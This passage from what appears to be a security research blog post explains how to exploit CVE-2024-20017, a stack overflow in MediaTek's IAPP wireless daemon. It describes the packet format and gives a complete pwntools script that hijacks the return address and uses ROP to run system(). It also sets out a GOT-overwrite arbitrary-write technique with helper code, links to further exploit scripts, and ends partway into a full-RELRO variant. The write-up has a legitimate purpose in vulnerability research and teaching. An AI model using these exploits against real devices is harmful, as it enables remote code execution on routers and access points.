  <span class="n">IAPP_MEM_MOVE</span><span class="p">(</span><span class="n">OidReq</span><span class="o">-&gt;</span><span class="n">Buf</span><span class="o">+</span><span class="n">FT_IP_ADDRESS_SIZE</span><span class="p">,</span>
        <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">InitVec</span><span class="p">,</span> <span class="n">IAPP_SB_INIT_VEC_SIZE</span><span class="p">);</span>
  <span class="n">IAPP_MEM_MOVE</span><span class="p">(</span><span class="n">OidReq</span><span class="o">-&gt;</span><span class="n">Buf</span><span class="o">+</span><span class="n">FT_IP_ADDRESS_SIZE</span><span class="o">+</span><span class="n">IAPP_SB_INIT_VEC_SIZE</span><span class="p">,</span>
        <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">SB</span><span class="p">,</span> <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">Length</span><span class="p">);</span>
  <span class="c1">// BUG: overflow occurs here</span>
  <span class="n">IAPP_MEM_MOVE</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kdp_info</span><span class="p">,</span> <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">SB</span><span class="p">,</span> <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">Length</span><span class="p">);</span>
</code></pre></div></div>
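
<p>To make the overflow bound concrete, here is a minimal sketch of the arithmetic, using only the two sizes quoted above (the 1600-byte packet limit and the 167-byte <code class="language-plaintext highlighter-rouge">kdp_info</code> struct). The function name <code class="language-plaintext highlighter-rouge">overflow_bytes</code> is hypothetical and only models the check; it is not code from the daemon.</p>

```python
# Sizes taken from the post; the function name is hypothetical.
MAX_PKT_LEN = 1600      # only bound enforced on the attacker-supplied Length
KDP_INFO_SIZE = 167     # size of the stack-allocated kdp_info destination


def overflow_bytes(length: int) -> int:
    """Return how many bytes a copy of `length` bytes writes past kdp_info."""
    if length > MAX_PKT_LEN:
        raise ValueError("rejected by the existing max-packet-length check")
    return max(0, length - KDP_INFO_SIZE)


if __name__ == "__main__":
    for length in (0x60, KDP_INFO_SIZE, 0x150, MAX_PKT_LEN):
        print(f"Length={length:#06x} -> {overflow_bytes(length)} bytes past kdp_info")
```

<p>Any <code class="language-plaintext highlighter-rouge">Length</code> above 167 spills into whatever follows <code class="language-plaintext highlighter-rouge">kdp_info</code> on the stack, and the largest accepted value gives the 1433-byte figure mentioned above.</p>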

<h3 id="code-flow-from-source-to-sink">code flow from source to sink</h3>

<p>The code flow from input to the vulnerable function is:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">IAPP_Start()</code> starts the main processing loop that calls <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code></li>
  <li><code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> calls <code class="language-plaintext highlighter-rouge">select()</code> to find ready socks and calls the appropriate protocol handler function for each sock that is ready</li>
  <li>Assuming the packet is received over UDP, <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> will call <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerUdp()</code>, passing in a pointer <code class="language-plaintext highlighter-rouge">pPktBuf</code> to be used to store the data received</li>
  <li><code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerUdp()</code> calls <code class="language-plaintext highlighter-rouge">recvfrom()</code> to read data from the UDP socket and, assuming the data is successfully read, casts the data to <code class="language-plaintext highlighter-rouge">struct IappHdr</code> and checks the <code class="language-plaintext highlighter-rouge">command</code> field; if the value is <code class="language-plaintext highlighter-rouge">50</code>, <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> is called to handle the request</li>
  <li><code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> will then use the raw packet data as described above, using the <code class="language-plaintext highlighter-rouge">Length</code> field of the <code class="language-plaintext highlighter-rouge">RT_IAPP_SEND_SECURITY_BLOCK</code> struct embedded in the packet in a call to <code class="language-plaintext highlighter-rouge">IAPP_MEM_MOVE</code> (wrapper for <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>), which will write from an offset of the packet data to a stack-allocated struct <code class="language-plaintext highlighter-rouge">kdp_info</code>. This is where the overflow occurs.</li>
</ul>

<h3 id="overview-of-the-injection-point">overview of the injection point</h3>

<p>Before going into the details of exploitation let’s take a second to review the injection point where
the corruption occurs, the expected payload format, and the constraints that exist.</p>

<p>The max size that will be read from the UDP socket by the application is 1600 bytes, so this is the
max size of the payload we can send. Accounting for the portions of the payload that must be present
to reach the vulnerable code, this gives us about 1430 bytes we can use to corrupt other data. The
definitions of the <code class="language-plaintext highlighter-rouge">RT_IAPP_HEADER</code> and <code class="language-plaintext highlighter-rouge">RT_IAPP_SEND_SECURITY_BLOCK</code> structs are shown below. The
former is embedded into the latter and this represents the format that requests are expected to
arrive in; the application will cast the data read from the socket directly to these types.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* IAPP header in the frame body, 6B */</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">PACKED</span> <span class="n">_RT_IAPP_HEADER</span> <span class="p">{</span>
  <span class="n">UCHAR</span> <span class="n">Version</span><span class="p">;</span>  <span class="cm">/* indicates the protocol version of the IAPP */</span>
  <span class="n">UCHAR</span> <span class="n">Command</span><span class="p">;</span>  <span class="cm">/* ADD-notify, MOVE-notify, etc. */</span>
  <span class="n">UINT16</span>  <span class="n">Identifier</span><span class="p">;</span> <span class="cm">/* aids in matching requests and responses */</span>
  <span class="n">UINT16</span>  <span class="n">Length</span><span class="p">;</span>   <span class="cm">/* indicates the length of the entire packet */</span>
<span class="p">}</span> <span class="n">RT_IAPP_HEADER</span><span class="p">;</span>

<span class="k">typedef</span> <span class="k">struct</span> <span class="n">PACKED</span> <span class="n">_RT_IAPP_SEND_SECURITY_BLOCK</span> <span class="p">{</span>
  <span class="n">RT_IAPP_HEADER</span>  <span class="n">IappHeader</span><span class="p">;</span>
  <span class="n">UCHAR</span>     <span class="n">InitVec</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
  <span class="n">UINT16</span>      <span class="n">Length</span><span class="p">;</span>
  <span class="n">UCHAR</span>     <span class="n">SB</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span> <span class="n">RT_IAPP_SEND_SECURITY_BLOCK</span><span class="p">;</span>
</code></pre></div></div>

<p>The main payload section of the <code class="language-plaintext highlighter-rouge">RT_IAPP_SEND_SECURITY_BLOCK</code> is in the <code class="language-plaintext highlighter-rouge">SB[]</code> field; data is
appended directly to the tail of this struct and the size of this payload is meant to be stored in
the <code class="language-plaintext highlighter-rouge">Length</code> field of the struct. In order to pass other validation checks, the <code class="language-plaintext highlighter-rouge">Length</code> field of
the <code class="language-plaintext highlighter-rouge">IappHeader</code> struct should be kept small; in my payloads I use a size of <code class="language-plaintext highlighter-rouge">0x60</code>. Finally, the
<code class="language-plaintext highlighter-rouge">RT_IAPP_HEADER.Command</code> field must be set to <code class="language-plaintext highlighter-rouge">50</code> in order to reach the vulnerable handler
<code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB</code>.</p>
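
<p>As a rough illustration of that layout, the sketch below packs the two structs with Python’s standard <code class="language-plaintext highlighter-rouge">struct</code> module. The helper <code class="language-plaintext highlighter-rouge">build_ssb_packet</code> and the constant name are made up for this example, and the byte order of the header fields is an assumption that simply mirrors what the exploit scripts in this post send (little-endian header, big-endian SSB <code class="language-plaintext highlighter-rouge">Length</code>).</p>

```python
import struct

# Hypothetical constant name; 50 is the Command value that reaches IAPP_RcvHandlerSSB().
IAPP_CMD_SEND_SECURITY_BLOCK = 50


def build_ssb_packet(sb: bytes, ssb_length: int, hdr_length: int = 0x60) -> bytes:
    """Pack RT_IAPP_HEADER + InitVec + Length, then append the SB[] payload."""
    # RT_IAPP_HEADER (6 bytes): Version, Command, Identifier, Length.
    # Assumption: little-endian, matching the bytes the exploit scripts send.
    header = struct.pack("<BBHH", 0, IAPP_CMD_SEND_SECURITY_BLOCK, 0, hdr_length)
    init_vec = bytes(8)  # UCHAR InitVec[8]
    # The handler runs NTOH_S() on this field, so it goes out in network byte order.
    length = struct.pack(">H", ssb_length)
    return header + init_vec + length + sb


if __name__ == "__main__":
    pkt = build_ssb_packet(b"\x22" * 32, ssb_length=0x150)
    print(len(pkt), pkt[:16].hex())
```

<p>Note that <code class="language-plaintext highlighter-rouge">ssb_length</code> is passed separately from the payload on purpose: the bug is precisely that the daemon trusts this field rather than the number of bytes that actually follow it.</p>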

<p>Other than these basic constraints/requirements, there aren’t any other issues to work around like
avoiding null bytes or other restricted values.</p>

<h2 id="exploit-1-rip-hijack-via-corrupted-return-address-rop-to-system">exploit 1: RIP hijack via corrupted return address, ROP to system()</h2>

<ul>
  <li>Build: non-forking, no optimizations</li>
  <li>Mitigations: NX</li>
</ul>

<p>We’ll first start with the simplest path to achieve code execution, assuming <em>no</em> exploit mitigations
are in place (except non-executable stack). This means addresses are predictable and no leak is
necessary.</p>

<p>This exploit is a classic RIP hijack, using the stack overflow to corrupt the saved return address
and redirect execution. This is about as straightforward as it gets: overflow the stack, align the
overflow to corrupt the saved return address with the desired address to jump to, and wait for the
function to return and use the corrupted value. What you jump to and how you leverage that to get
more control is a blank canvas (for the most part). In the case of this exploit, we keep it simple
by using the corruption to jump to a ROP gadget that will pop a pointer to a string containing a
command to run into the correct registers, and then call <code class="language-plaintext highlighter-rouge">system()</code> to have the command executed.
As ASLR isn’t enabled, we assume knowledge of the address of <code class="language-plaintext highlighter-rouge">system()</code> and a stack address close
to where our payload data will be.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="sh">'</span><span class="s">error</span><span class="sh">'</span>

<span class="n">TARGET_IP</span> <span class="o">=</span> <span class="sh">"</span><span class="s">127.0.0.1</span><span class="sh">"</span>
<span class="n">TARGET_PORT</span> <span class="o">=</span> <span class="mi">3517</span>
<span class="n">PAD_BYTE</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x22</span><span class="sh">"</span>

<span class="c1"># this is an addr on the stack close to where our payload data is
</span><span class="n">WRITEABLE_STACK</span> <span class="o">=</span> <span class="mh">0x7fffffff0d70</span>

<span class="c1"># Addresses
</span><span class="n">SYSTEM_ADDR</span>     <span class="o">=</span> <span class="mh">0x7ffff7c50d70</span>
<span class="n">EXIT_ADDR</span>       <span class="o">=</span> <span class="mh">0x7ffff7c455f0</span>
<span class="n">TARGET_RBP_ADDR</span> <span class="o">=</span> <span class="mh">0x5555555555555555</span>  <span class="c1"># doesn't matter
</span><span class="n">GADGET_2</span>        <span class="o">=</span> <span class="mh">0x42bf72</span>  <span class="c1"># pop rdi ; pop rbp ; ret
</span>
<span class="c1"># NOTE: tweak `stack_offset` if env changes and exploit isn't finding command string; +/- 0x10-0x40
# should usually do it.
</span><span class="k">def</span> <span class="nf">create</span><span class="p">(</span><span class="n">stack_offset</span><span class="o">=</span><span class="mh">0x1b0</span><span class="p">):</span>
    <span class="c1"># iapp header
</span>    <span class="n">header</span> <span class="o">=</span> <span class="nf">p8</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>      <span class="c1"># version
</span>    <span class="n">header</span> <span class="o">+=</span> <span class="nf">p8</span><span class="p">(</span><span class="mi">50</span><span class="p">)</span>    <span class="c1"># command
</span>    <span class="n">header</span> <span class="o">+=</span> <span class="nf">p16</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>    <span class="c1"># ident
</span>    <span class="n">header</span> <span class="o">+=</span> <span class="nf">p16</span><span class="p">(</span><span class="mh">0x60</span><span class="p">)</span> <span class="c1"># length
</span>
    <span class="c1"># SSB struct frame
</span>    <span class="n">ssb_pkt</span> <span class="o">=</span> <span class="nf">p8</span><span class="p">(</span><span class="mi">55</span><span class="p">)</span> <span class="o">*</span> <span class="mi">8</span>     <span class="c1"># char buf[8], InitVec
</span>    <span class="n">ssb_pkt</span> <span class="o">+=</span> <span class="nf">p16</span><span class="p">(</span><span class="mh">0x150</span><span class="p">,</span> <span class="n">endian</span><span class="o">=</span><span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)</span>  <span class="c1"># u16 Length
</span>
    <span class="c1"># Main payload
</span>    <span class="n">final_pkt</span> <span class="o">=</span> <span class="n">header</span> <span class="o">+</span> <span class="n">ssb_pkt</span>
    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="n">PAD_BYTE</span> <span class="o">*</span> <span class="mi">176</span>
    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">WRITEABLE_STACK</span><span class="p">)</span>
    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="n">PAD_BYTE</span> <span class="o">*</span> <span class="mi">16</span>
    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">WRITEABLE_STACK</span><span class="p">)</span>

    <span class="c1"># RBP OVERWRITE
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">TARGET_RBP_ADDR</span><span class="p">)</span>

    <span class="c1"># Core Exploit
</span>    <span class="c1"># this will be the first place execution will be redirected; will load the next value into $rdi
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">GADGET_2</span><span class="p">)</span>
    <span class="c1"># pointer to the command string defined a few lines down
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">WRITEABLE_STACK</span> <span class="o">-</span> <span class="n">stack_offset</span><span class="p">)</span>
    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="n">PAD_BYTE</span> <span class="o">*</span> <span class="mi">8</span>
    <span class="c1"># address to system to jump to for code exec
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">SYSTEM_ADDR</span><span class="p">)</span>

    <span class="c1"># address to exit() cleanly upon return
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">EXIT_ADDR</span><span class="p">)</span>
    <span class="c1"># command to run through system()
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">"</span><span class="s">echo LETSGO!!!</span><span class="se">\x00</span><span class="sh">"</span>
    <span class="k">return</span> <span class="n">final_pkt</span>

<span class="c1"># send payload bytes to target
</span><span class="n">final_pkt</span> <span class="o">=</span> <span class="nf">create</span><span class="p">()</span>
<span class="n">conn</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="n">TARGET_IP</span><span class="p">,</span> <span class="n">TARGET_PORT</span><span class="p">,</span> <span class="n">typ</span><span class="o">=</span><span class="sh">'</span><span class="s">udp</span><span class="sh">'</span><span class="p">)</span>
<span class="n">conn</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">final_pkt</span><span class="p">)</span>

<span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="sh">'</span><span class="s">info</span><span class="sh">'</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">sent payload to target </span><span class="si">{</span><span class="n">TARGET_IP</span><span class="si">}</span><span class="s">:</span><span class="si">{</span><span class="n">TARGET_PORT</span><span class="si">}</span><span class="s"> (</span><span class="si">{</span><span class="nf">len</span><span class="p">(</span><span class="n">final_pkt</span><span class="p">)</span><span class="si">}</span><span class="s"> bytes)</span><span class="sh">"</span><span class="p">)</span>
</code></pre></div></div>
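
<p>If it helps to see how the tail of that payload gets consumed, here is a small sketch that walks the chain the way the CPU would after the vulnerable function returns. It is a toy model, not an emulator: <code class="language-plaintext highlighter-rouge">run_gadget</code> is a hypothetical helper that only understands the one <code class="language-plaintext highlighter-rouge">pop rdi ; pop rbp ; ret</code> gadget, and the addresses are the same build-specific values used in the exploit above.</p>

```python
import struct

# Values copied from the exploit above; CMD_PTR is WRITEABLE_STACK - stack_offset.
GADGET_2 = 0x42BF72            # pop rdi ; pop rbp ; ret
SYSTEM_ADDR = 0x7FFFF7C50D70
EXIT_ADDR = 0x7FFFF7C455F0
CMD_PTR = 0x7FFFFFFF0D70 - 0x1B0


def run_gadget(chain: bytes) -> dict:
    """Model the vulnerable function's `ret` followed by GADGET_2 (toy model)."""
    words = list(struct.unpack(f"<{len(chain) // 8}Q", chain))
    regs = {"rip": words.pop(0)}      # function epilogue: ret -> GADGET_2
    if regs["rip"] != GADGET_2:
        raise ValueError("this sketch only models GADGET_2")
    regs["rdi"] = words.pop(0)        # pop rdi -> pointer to the command string
    regs["rbp"] = words.pop(0)        # pop rbp -> filler, value is irrelevant
    regs["rip"] = words.pop(0)        # ret -> system()
    regs["return_to"] = words.pop(0)  # where system() returns afterwards: exit()
    return regs


# The five 8-byte words that follow the overwritten saved RBP in the payload.
chain = struct.pack("<5Q", GADGET_2, CMD_PTR, 0x2222222222222222, SYSTEM_ADDR, EXIT_ADDR)

if __name__ == "__main__":
    for name, value in run_gadget(chain).items():
        print(f"{name:>9} = {value:#x}")
```

<p>The takeaway is that by the time execution lands in <code class="language-plaintext highlighter-rouge">system()</code>, <code class="language-plaintext highlighter-rouge">rdi</code> already holds the address of our command string, which is all the x86-64 calling convention needs for a single-argument call.</p>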

<p>On a successful run, the output of the iappd daemon will show a failed call to bash and then print
out the string “LETSGO!!!”, demonstrating the successful execution of <code class="language-plaintext highlighter-rouge">echo</code>, before the daemon exits
cleanly.</p>

<p>(Un)fortunately, these days you’re almost guaranteed to find stack cookies and ASLR in use on
embedded platforms, which will prevent such trivial exploitation. In those cases, you’ll need an
info leak to (hopefully) leak the cookie value or you’ll just have to move on to other techniques
that don’t rely on corrupting the saved return address.</p>

<hr />

<h2 id="exploit-2-arbitrary-write-via-pointer-corruption-got-overwrite">exploit 2: arbitrary write via pointer corruption, GOT overwrite</h2>

<ul>
  <li>Build: x86_64, non-forking, no optimizations</li>
  <li>Mitigations: ASLR, stack canaries, NX, partial RELRO</li>
  <li><a href="https://github.com/mellow-hype/cve-2024-20017/blob/main/x86_64/x86_64_partial_relro_got.py" target="_blank">Exploit code</a></li>
</ul>

<p>Continuing from where the previous section left off, let’s say at least stack canaries and ASLR are
enabled and the exploit above is no longer viable. Since we don’t have an info leak, let’s shift the
focus from corrupting the saved return address on the stack and consider what else could be achieved
with the corruption we’re able to cause <em>before</em> reaching the stack canary.</p>

<p>As you may already know, the locally declared variables for a function are stored in the stack frame
for that function, immediately ahead of the saved return address and base pointer address. The
variables that sit between the end of the overflowed buffer and the start of the previous stack
frame will be corrupted by the overflow. Depending on how those values are used in the code that
executes after we’ve corrupted memory, it may be possible to abuse the effects of the corruption to
gain further control.</p>

<p>Below are the locally declared variables for the vulnerable function <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="n">RT_IAPP_SEND_SECURITY_BLOCK</span> <span class="o">*</span><span class="n">pSendSB</span><span class="p">;</span>
  <span class="n">UCHAR</span> <span class="o">*</span><span class="n">pBufMsg</span><span class="p">;</span>
  <span class="n">UINT32</span> <span class="n">BufLen</span><span class="p">,</span> <span class="n">if_idx</span><span class="p">;</span>
  <span class="n">POID_REQ</span> <span class="n">OidReq</span><span class="p">;</span>
  <span class="n">FT_KDP_EVT_KEY_ELM</span> <span class="n">kdp_info</span><span class="p">;</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">kdp_info</code> struct is the one that will be overflowed from the effects of the bug, and all of the
variables declared before it can be corrupted. Of particular interest in these situations are
pointers, which could potentially be abused to get a powerful write primitive – if we alter where a
pointer points to, any assignments or writes that the application performs using that pointer will
result in data being written to an arbitrary address of our choice.</p>

<p>In this case, only a few lines of code remain which make use of the variables after the corruption
is triggered by the call to <code class="language-plaintext highlighter-rouge">IAPP_MEM_MOVE()</code>. These lines are shown in the snippet below:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="n">IAPP_HEX_DUMP</span><span class="p">(</span><span class="s">"kdp_info.MacAddr"</span><span class="p">,</span> <span class="n">kdp_info</span><span class="p">.</span><span class="n">MacAddr</span><span class="p">,</span> <span class="n">ETH_ALEN</span><span class="p">);</span>
  <span class="n">if_idx</span> <span class="o">=</span> <span class="n">mt_iapp_find_ifidx_by_sta_mac</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pCtrlBK</span><span class="o">-&gt;</span><span class="n">SelfFtStaTable</span><span class="p">,</span> <span class="n">kdp_info</span><span class="p">.</span><span class="n">MacAddr</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">if_idx</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">DBGPRINT</span><span class="p">(</span><span class="n">RT_DEBUG_TRACE</span><span class="p">,</span> <span class="s">"iapp&gt; %s: cannot find wifi interface</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">__FUNCTION__</span><span class="p">);</span>
    <span class="k">return</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="n">OidReq</span><span class="o">-&gt;</span><span class="n">Len</span> <span class="o">=</span> <span class="n">BufLen</span> <span class="o">-</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">OID_REQ</span><span class="p">);</span>

  <span class="n">IAPP_MsgProcess</span><span class="p">(</span><span class="n">pCtrlBK</span><span class="p">,</span> <span class="n">IAPP_SET_OID_REQ</span><span class="p">,</span> <span class="n">pBufMsg</span><span class="p">,</span> <span class="n">BufLen</span><span class="p">,</span> <span class="n">if_idx</span><span class="p">);</span>

</code></pre></div></div>

<p>The most interesting of these is the assignment to <code class="language-plaintext highlighter-rouge">OidReq-&gt;Len</code> using the value in <code class="language-plaintext highlighter-rouge">BufLen</code>: the
former is an access that will dereference a pointer we can corrupt (<code class="language-plaintext highlighter-rouge">OidReq</code>), and the latter is an
access of a 32-bit value that we can also control (<code class="language-plaintext highlighter-rouge">BufLen</code>). In other words, we control both sides
of the assignment expression and, after accounting for the constant <code class="language-plaintext highlighter-rouge">sizeof(OID_REQ)</code> that gets
subtracted, can write an arbitrary 4-byte value to an arbitrary address.</p>
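
<p>As a rough illustration of that arithmetic, here is a minimal Python sketch of how the two corrupted
values could be chosen for a single write. Note that <code class="language-plaintext highlighter-rouge">SIZEOF_OID_REQ</code> and <code class="language-plaintext highlighter-rouge">LEN_OFFSET</code> are
placeholder values I made up for the example, not the real struct layout; the real numbers would
have to come from the target binary. The <code class="language-plaintext highlighter-rouge">simulate()</code> helper only models the assignment so the math can
be checked.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Hypothetical layout values; the real ones must be taken from the target binary.
SIZEOF_OID_REQ = 0x20   # assumed sizeof(OID_REQ)
LEN_OFFSET = 0x8        # assumed offset of the Len field inside OID_REQ


def plan_write(target_addr, value):
    """Return the (OidReq, BufLen) values to plant for one 4-byte write."""
    # The store goes to OidReq + LEN_OFFSET, so back the pointer up by that much.
    fake_oidreq = target_addr - LEN_OFFSET
    # The program stores BufLen - sizeof(OID_REQ); pre-add it, wrapping at 32 bits.
    fake_buflen = (value + SIZEOF_OID_REQ) % 2**32
    return fake_oidreq, fake_buflen


def simulate(fake_oidreq, fake_buflen):
    """Model where the vulnerable assignment writes, and what value lands there."""
    written = (fake_buflen - SIZEOF_OID_REQ) % 2**32
    return fake_oidreq + LEN_OFFSET, written


if __name__ == "__main__":
    ptr, buflen = plan_write(0x41B000, 0x6E69622F)
    print(hex(ptr), hex(buflen), [hex(v) for v in simulate(ptr, buflen)])
</code></pre></div></div>

<p>The 32-bit wraparound matters for values close to <code class="language-plaintext highlighter-rouge">0xffffffff</code>, where adding the struct size
overflows and the planted <code class="language-plaintext highlighter-rouge">BufLen</code> ends up being a small number.</p>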

<p>So, what can we accomplish with this primitive? There are multiple strategies that might work at
this point and this is where the creativity in exploit development comes in. If our ultimate goal is
to call <code class="language-plaintext highlighter-rouge">system()</code> to execute shell commands, we’ll generally have to do the following:</p>

<ol>
  <li>Get the command string we want executed into memory at a <em>known</em> address</li>
  <li>Get the pointer to that string placed into the appropriate register to be passed as the first argument to <code class="language-plaintext highlighter-rouge">system()</code> (i.e. put into <code class="language-plaintext highlighter-rouge">rdi</code> on x86_64)</li>
  <li>Redirect execution to <code class="language-plaintext highlighter-rouge">system()</code></li>
</ol>

<p>The exploit linked above applies this concept to corrupt the <code class="language-plaintext highlighter-rouge">OidReq</code> pointer and uses the 4-byte
write primitive to iteratively write a shell payload into a segment of the GOT (<strong>1</strong>); as the
binary is built with no PIE and only partial RELRO, the GOT is always at a predictable address and
writeable, so we can use it as a buffer for our payload. The only constraint on this is that we must
avoid overwriting GOT entries for functions that will get called somewhere along the execution path
to the vulnerable code, as this would result in a crash before the exploit has finished. The exploit
sends multiple corruption payloads to write the shell command, adjusting the corrupted <code class="language-plaintext highlighter-rouge">OidReq</code>
pointer on each request by +4 bytes to turn the 4-byte write into an arbitrary write-what-where. The
exploit then uses the 4-byte write to corrupt the GOT entry of <code class="language-plaintext highlighter-rouge">read()</code> with the address of a ROP
gadget that kicks off a ROP chain to adjust the stack, pop the address of the shell payload in the
GOT into <code class="language-plaintext highlighter-rouge">$rdi</code> (<strong>2</strong>), and then jump to the call to <code class="language-plaintext highlighter-rouge">system()</code> (<strong>3</strong>) located in
<code class="language-plaintext highlighter-rouge">IAPP_PID_Kill()</code> to have the shell payload executed. <code class="language-plaintext highlighter-rouge">read()</code> was chosen as the GOT entry to
corrupt to redirect execution as it’s not in the execution path of the vulnerable code and we can
trigger it on-demand by sending a request over TCP since the handler for TCP connections uses
<code class="language-plaintext highlighter-rouge">read()</code> rather than <code class="language-plaintext highlighter-rouge">recvfrom()</code>; all of the earlier payloads are sent over UDP.</p>
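
<p>To make the “+4 bytes per request” idea concrete, here is a small Python sketch (not taken from the
linked exploit) that splits a command string into the sequence of address/value pairs the 4-byte
write would need to be triggered with. The base address used in the example is a made-up
placeholder, and the sketch ignores any constraints the real payload may have on which byte values
are allowed.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def chunk_writes(base_addr, payload):
    """Split payload into (address, 32-bit value) pairs, one per 4-byte write."""
    # Pad with NUL bytes so the length is a multiple of 4 and the string is
    # always terminated (a payload already aligned to 4 gets a full NUL word).
    padded = payload + b"\x00" * (4 - len(payload) % 4)
    writes = []
    for off in range(0, len(padded), 4):
        value = int.from_bytes(padded[off:off + 4], "little")
        writes.append((base_addr + off, value))
    return writes


if __name__ == "__main__":
    # 0x41B000 is a hypothetical address standing in for a spot in the GOT.
    for addr, value in chunk_writes(0x41B000, b"echo LETSGO!!!"):
        print(hex(addr), hex(value))
</code></pre></div></div>

<p>Each pair corresponds to one corruption request: the address becomes the target of the corrupted
<code class="language-plaintext highlighter-rouge">OidReq</code> pointer and the value is what should end up stored there.</p>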

<p>One important bit in the way this exploit works is that the redirection of execution happens
asynchronously from the payload that caused the corruption – it’s only triggered when we send the final TCP
request that causes the corrupted GOT entry for <code class="language-plaintext highlighter-rouge">read()</code> to be called, which means none of our
controlled data is at the top of the stack and none of the data we send in the TCP packet is ever
actually read (since <code class="language-plaintext highlighter-rouge">read()</code> is gone). This is a problem since we need to have controlled values at
the top of the stack after the first ROP gadget returns so that we can retain control of execution.
This is where a bit of luck comes in – in this case, we’re able to find some of the payload data
from the earlier requests that were sent about 40 bytes below the top of the stack frame (the stack
isn’t cleared between functions/uses), so we’re able to reach the payload data by popping 5 values
from the stack before doing anything else.</p>

<p>This exploit avoids corrupting the stack metadata at all, so stack canaries don’t come into play. It also
only makes use of predictable addresses and ROP to avoid dealing with ASLR, so no leak is needed.</p>

<p><img src="/assets/images/mtk-wapp-exploit2.png" alt="mtk-wapp-exploit2.png" /></p>

<hr />

<h2 id="exploit-3-return-address-corruption--arbitrary-write-via-rop-full-relro">exploit 3: return address corruption + arbitrary write via ROP (full RELRO)</h2>

<ul>
  <li>Build: x86_64, optimization level 2, forking daemon</li>
  <li>Mitigations: ASLR, full RELRO, NX</li>
  <li><a href="https://github.com/mellow-hype/cve-2024-20017/blob/main/x86_64/x86_64_full_relro.py" target="_blank">Exploit code</a></li>
</ul>

<p>So, the last exploit was able to get around the stack canaries and ASLR by using pointer corruption
to get an arbitrary write primitive, which was needed to allow us to write controlled values into
the GOT so that we would know the address of that data for use later in the exploit. But what if
there wasn’t a pointer nearby for us to corrupt to get that arbitrary write? Well, it turns out
that if the application is built with optimization level set to 2 (<code class="language-plaintext highlighter-rouge">-O2</code>), various functions along
the execution path to the vulnerable code get inlined into one big function running within the scope
of <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code>, resulting in changes to the stack layout and ordering of variables. This
ends up making it impossible to corrupt the <code class="language-plaintext highlighter-rouge">OidReq</code> pointer that we previously relied on for the
arbitrary write, so another approach must be found.</p>

<p>Since we lost the write primitive we used in the previous exploit, we’ll disable stack canaries on
this version to give us a code redirection primitive to start with (we need to have <em>something</em> to
start with). This example is meant to demonstrate a way of getting an arbitrary write primitive from
a code exec primitive, as it’s not usually enough to be able to <em>just</em> redirect execution, so having
both will always make things much easier. To keep things interesting, we’ll enable full RELRO so
that the GOT and PLT sections are no longer writeable.</p>

<h3 id="arbitrary-write-via-rop">arbitrary write via ROP</h3>

<p>The first thing we need to do given the new restrictions is find a way to get an arbitrary write
primitive to allow us to write our command payload at a predictable address. Since we can influence
